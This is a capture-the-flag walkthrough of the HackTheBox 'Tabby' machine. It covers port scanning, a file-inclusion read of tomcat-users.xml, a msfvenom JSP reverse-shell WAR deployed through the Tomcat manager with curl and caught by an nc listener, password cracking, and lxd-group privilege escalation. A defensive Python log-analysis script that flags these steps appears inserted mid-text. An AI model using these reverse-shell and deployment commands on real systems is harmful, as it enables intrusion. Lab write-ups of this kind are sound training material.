# Tabby Walkthrough

Hey folks, here we are again continuing the **HackTheBox** machines series, this time with the “**Tabby**” machine. Before we get started, let’s take a look at the machine’s info.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*ao1pXjHFRkDOpbgqC1ON8Q.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*-HKJ1zzk5YQJ3S1U618h9A.png" alt=""><figcaption></figcaption></figure>

As you can see it’s rated easy, but in my opinion it should be medium, because every step has something new and it can be hard for beginners. Let’s get started…

> We will work on it without `Metasploit`

As usual, we begin our walkthrough with an `nmap` scan to get all open ports and the services running on them. Let’s perform a standard scan:

```
nmap -A -T4 10.10.10.194

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
```

We have `22/80/8080` open, running `apache 2.4.41 / openssh 8.2p1 / apache tomcat`. So what do we do?

1. Try to search for exploits in `apache 2.4.41` using the `searchsploit` tool
2. Try to brute-force `ssh` credentials using `nmap scripts` and the `brutespray` tool
3. Try to brute-force `tomcat` credentials using `metasploit` and `nmap scripts`
4. Try to enumerate the websites at `10.10.10.194:80` and `10.10.10.194:8080` and do content discovery using `dirbuster/dirsearch/ffuf/gobuster`

Let’s start…

## **Enumeration**

We will try to enumerate the services to find misconfigurations and vulnerabilities.

### **Public exploitation**

I’ve searched for public exploits on `exploit-db`, `rapid-7` and other public exploit sites for `apache 2.4.41 / openssh 8.2p1`, but unfortunately found nothing.

For `Tomcat` we found exploits on `rapid-7` and `exploit-db`, but they require the tomcat credentials and the manager path, so we will need them later, not now.

### **SSH Credentials**

I’ve brute-forced ssh credentials using `nmap` and `brutespray`, but nothing useful!!

### **Tomcat login credentials brute force**

I’ve brute-forced the credentials as well, using `metasploit`, but again nothing useful.

Check the method at [Metasploit](https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/)

### **Website Enumeration and content discovery**

At first I will open `10.10.10.194:80`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*cIxN__FARTIWaoDJ_Ndikg.png" alt=""><figcaption></figcaption></figure>

Nice, we have a website that looks like a real-world site, apparently a hosting company, so let’s explore it and check its source code.

While checking the source code we found this link `megahosting.htb/news.php?file=statement`, so we need to add the `megahosting` domain to `/etc/hosts` by appending this line to the `/etc/hosts` file:

`10.10.10.194 megahosting` and then we can access the link above.

<figure><img src="https://cdn-images-1.medium.com/max/800/1*BLuV_eb6j-yKYr7EUxg_yg.png" alt=""><figcaption></figcaption></figure>

Let’s Google `megahosting exploit`; the site may be running software with a known public exploit.

We have found this one:

<figure><img src="https://cdn-images-1.medium.com/max/800/1*h6ZpUbKeltX24ixIXqFKqw.png" alt=""><figcaption></figcaption></figure>

## Exploitation

So far we don’t know the version, so let’s try this exploit against the link above, `megahosting.htb/news.php?file=statement`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*dHQZY5QakUE-NQqAlJZW0Q.png" alt=""><figcaption></figcaption></figure>

Good, it’s vulnerable as well.

Let’s try to get information from the `tomcat` directories; they may contain sensitive data.

After some enumeration, I’ve found a bunch of directories in these links

and also searched for the location of the `tomcat-users.xml` file and found it among them, so let’s try to open all of them with Burp Intruder or any similar tool

<figure><img src="https://cdn-images-1.medium.com/max/800/1*FYs9CeaPXOHWCVo8szaL6g.png" alt=""><figcaption></figcaption></figure>

`/var/share/tomcat9/etc/tomcat-users.xml` is readable and contains credentials for the `admin-gui` and `manager-script` roles, so let’s take these credentials and try to upload a reverse shell payload.

Note: one of the privileges of `admin-gui` and `manager-script` is deploying files on the server, so we will create a reverse shell payload and then deploy it.

```
# generate the reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.war

# deploy the payload through the manager text interface (curl --upload-file sends a PUT)
curl --upload-file <path/to/shell.war> "http://megahosting:8080/manager/text/deploy?path=/shell&update=true"
```

Then start a listener with `nc -lvnp <port-number>` and browse to `megahosting:8080/shell` to trigger it.
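A defender-side counterpart to the chain above (the `news.php?file=` traversal and the manager-app deploy), added here as an example and not part of the original walkthrough: it parses access-log lines, flags traversal sequences in query parameters even when they are double URL-encoded, flags PUT/POST requests to the Tomcat manager application, and then reports the first requests to the freshly deployed context. The log lines, client IPs and timestamps are constructed for the example and are not taken from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed common-log-format lines (not real traffic) mirroring this walkthrough's requests.
SAMPLE_LOG = """\
10.10.14.5 - - [19/Jul/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1520
10.10.14.5 - - [19/Jul/2020:10:01:30 +0000] "GET /news.php?file=../../../../var/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2341
10.10.14.5 - - [19/Jul/2020:10:02:11 +0000] "GET /news.php?file=..%252F..%252Fvar%252Fshare%252Ftomcat9%252Fetc%252Ftomcat-users.xml HTTP/1.1" 200 2341
10.10.14.5 - - [19/Jul/2020:10:05:44 +0000] "PUT /manager/text/deploy?path=/shell&update=true HTTP/1.1" 200 64
10.10.14.5 - - [19/Jul/2020:10:05:50 +0000] "GET /shell/ HTTP/1.1" 200 12
10.10.10.1 - - [19/Jul/2020:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'(^|[/\\])\.\.([/\\]|$)')  # ../ or ..\ inside a decoded value

def lfi_indicators(query):
    """[(param, decoded_value)] for query parameters carrying a traversal sequence."""
    hits = []
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # parse_qs decoded once; this also catches %252F
            if TRAVERSAL.search(decoded):
                hits.append((key, decoded))
    return hits

def analyze(log_text):
    """[(alert_type, client_ip, detail)]: traversal -> /manager/ deploy -> new context hit."""
    alerts, deployed = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url = m['ip'], m['method'], urlsplit(m['target'])
        for key, value in lfi_indicators(url.query):
            alerts.append(('lfi_traversal', ip, f'{key}={value}'))
        if url.path.startswith('/manager/') and method in ('PUT', 'POST'):
            # the text interface names the new context in ?path=; otherwise keep the URL
            ctx = parse_qs(url.query).get('path', [url.path])[0].rstrip('/') or '/'
            alerts.append(('manager_deploy', ip, ctx))
            if ctx != url.path:
                deployed.add(ctx)
        elif any(url.path == c or url.path.startswith(c + '/') for c in deployed):
            alerts.append(('deployed_context_hit', ip, url.path))
    return alerts

if __name__ == '__main__':
    for alert in analyze(SAMPLE_LOG):
        print(*alert, sep='\t')
```

On the sample it raises two traversal alerts for the `tomcat-users.xml` reads, one for the deploy to `/shell`, and one for the first visit to `/shell/`.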

<figure><img src="https://cdn-images-1.medium.com/max/800/1*ey3R6PzRKb6Gb6MDBoi2-A.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*bIRCw7dg1hvCm0G_JizSlQ.png" alt=""><figcaption></figcaption></figure>

So now we’re on the server but not as the user yet, so let’s check our privileges by opening the users’ directories

<figure><img src="https://cdn-images-1.medium.com/max/800/1*YhiQLwhpfgMW4hM8-kdOWA.png" alt=""><figcaption></figcaption></figure>

We can’t open the user directory, so let’s try to gain more privileges by searching for any important directories or files

After some enumeration, I found this backup file in `/var/www/html/files`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*S9k5n12Ac19QpTWOuscGmg.png" alt=""><figcaption></figcaption></figure>

So I will download it to the local machine and look at its content

We transfer it by starting a web server on the vulnerable machine and fetching the file from the attack machine:

```
# vulnerable machine
python3 -m http.server 80

# attack machine
wget http://10.10.10.194:80/backup-file-name
```

<figure><img src="https://cdn-images-1.medium.com/max/800/1*AkMx8Cpneu1P0vAQa1A_7g.png" alt=""><figcaption></figcaption></figure>

Now we have it on our attack machine, let’s `unzip` it with `unzip file-name`

<figure><img src="https://cdn-images-1.medium.com/max/800/1*RvtmpppGrNQGvg2txUFk2g.png" alt=""><figcaption></figcaption></figure>

It’s password protected, so you can use `hashcat` or `John the Ripper` to crack the password; I’ll use `fcrackzip` because it doesn’t take much time

<figure><img src="https://cdn-images-1.medium.com/max/800/1*8ZJjzoPxw6q4nTT2yUnV2w.png" alt=""><figcaption></figcaption></figure>

And we have the password `admin@it`

After unzipping the file I found nothing useful inside it, so let’s use the password in another way

Let’s try to use it to log in as the `ash` user → `su ash` and enter this password

<figure><img src="https://cdn-images-1.medium.com/max/800/1*GIO25U3pjTOV21d7iKiA6g.png" alt=""><figcaption></figcaption></figure>

Good, we have more privileges now, but not all we need yet, so let’s grab the `user.txt` first

<figure><img src="https://cdn-images-1.medium.com/max/800/1*oOwdmCFJEcRBxFRZu3TzRQ.png" alt=""><figcaption></figcaption></figure>

Good, now let’s try to find anything that leads us to root access.

If you noticed, the `ash` user is in the `lxd` group

<figure><img src="https://cdn-images-1.medium.com/max/800/1*GuDC1YISNLLryNANcRdoGQ.png" alt=""><figcaption></figcaption></figure>

So after some Googling about how to use this group membership to become root, I’ve found an awesome resource for it

> Before we follow this resource, let’s first get an interactive shell, because it will not work in the plain shell

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

That gives you an interactive shell in which you can work with `lxd`; then do exactly what this man does

As you will find in the link above, I’ve downloaded the `tar` file and transferred it to the vulnerable machine, as you can see

<figure><img src="https://cdn-images-1.medium.com/max/800/1*jHCxscn7mOrlL8Wz9TwJMw.png" alt=""><figcaption></figcaption></figure>

After that, I built it on the victim machine and created an image

<figure><img src="https://cdn-images-1.medium.com/max/800/1*fAG1ufa8zXhdXWAA6hLuqg.png" alt=""><figcaption></figcaption></figure>

The final step is to access the image we created

<figure><img src="https://cdn-images-1.medium.com/max/800/1*BjAc4lAA_YKdUCG0drLiIA.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://cdn-images-1.medium.com/max/800/1*noNDBePaZacv5fk27L2cMQ.png" alt=""><figcaption></figcaption></figure>

Let’s get our `root.txt` from the root directory

<figure><img src="https://cdn-images-1.medium.com/max/800/1*tPocGwPS-qwOVfHKm4s2bg.png" alt=""><figcaption></figcaption></figure>

There’s nothing in this directory

<figure><img src="https://cdn-images-1.medium.com/max/800/1*8QlV8Cb1QM8SPqEokQb2JQ.png" alt=""><figcaption></figcaption></figure>

It seems that he’s kidding me :)

Let’s search for the flag in all directories

After some search, I’ve found ❤

<figure><img src="https://cdn-images-1.medium.com/max/800/1*ydYziigwgD6BbBjiNTUc4Q.png" alt=""><figcaption></figcaption></figure>
